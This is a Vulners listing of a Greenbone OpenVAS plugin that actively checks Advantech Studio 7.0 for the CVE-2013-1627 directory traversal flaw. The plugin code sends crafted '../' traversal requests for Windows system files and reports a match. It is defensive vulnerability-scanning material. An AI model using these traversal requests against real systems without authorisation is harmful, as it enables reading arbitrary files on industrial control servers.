Lucene search
+L

Advantech Studio 'NTWebServer.exe' Directory Traversal Vulnerability - Active Check

🗓️ 07 Jan 2013 00:00:00Reported by Copyright (C) 2013 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 33 Views

Advantech Studio 'NTWebServer.exe' Directory Traversal Vulnerability - Active Check. Vulnerable to directory-traversal due to unsanitized user input. Affected version: 7.

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2013-1627
4 Dec 201200:00
circl
cve
CVE
CVE-2013-1627
11 Mar 201317:00
cve
cvelist
Cvelist
CVE-2013-1627
11 Mar 201317:00
cvelist
exploitdb
Exploit DB
Advantech Studio 7.0 - SCADA/HMI Directory Traversal
4 Dec 201200:00
exploitdb
euvd
EUVD
EUVD-2013-1661
7 Oct 202500:30
euvd
ics
ICS
InduSoft Advantech Studio Directory Traversal
10 Dec 201307:00
ics
nvd
NVD
CVE-2013-1627
11 Mar 201317:55
nvd
prion
Prion
Path traversal
11 Mar 201317:55
prion
redhatcve
RedhatCVE
CVE-2013-1627
22 May 202511:21
redhatcve
# SPDX-FileCopyrightText: 2013 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.103636");
  script_tag(name:"cvss_base", value:"7.8");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:N/A:N");
  script_version("2025-05-20T05:40:25+0000");
  script_cve_id("CVE-2013-1627");
  script_name("Advantech Studio 'NTWebServer.exe' Directory Traversal Vulnerability - Active Check");

  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/56871");
  script_xref(name:"URL", value:"http://www.advantech.com/products/Advantech-Studio/mod_3D1B45B0-B0AF-405C-A9CC-A27B35774634.aspx");

  script_tag(name:"last_modification", value:"2025-05-20 05:40:25 +0000 (Tue, 20 May 2025)");
  script_tag(name:"creation_date", value:"2013-01-07 11:53:56 +0100 (Mon, 07 Jan 2013)");
  script_category(ACT_ATTACK);
  script_tag(name:"qod_type", value:"remote_vul");
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2013 Greenbone AG");
  script_dependencies("find_service.nasl", "httpver.nasl", "os_detection.nasl", "global_settings.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("Host/runs_windows");
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_tag(name:"solution", value:"A Hotfix is available, contact the Vendor.");

  script_tag(name:"summary", value:"Advantech Studio is prone to a directory traversal vulnerability
  because it fails to sufficiently sanitize user-supplied input.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");

  script_tag(name:"impact", value:"A remote attacker can use directory-traversal strings to retrieve
  arbitrary files in the context of the affected application.");

  script_tag(name:"affected", value:"Advantech Studio 7.0 is vulnerable. Other versions may also be
  affected.");

  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("traversal_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("host_details.inc");
include("os_func.inc");

port = http_get_port(default:80);

url = "/startup.html";
if(!http_vuln_check(port:port, url:url, pattern:"Advantech", usecache:TRUE))
  exit(0);

files = traversal_files("windows");

foreach file(keys(files)) {

  url = crap(data:"../", length:9*6) + files[file];

  if(http_vuln_check(port:port, url:url, pattern:file)) {
    report = http_report_vuln_url(port:port, url:url);
    security_message(port:port, data:report);
    exit(0);
  }
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 May 2025 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 27.8
EPSS0.03387
33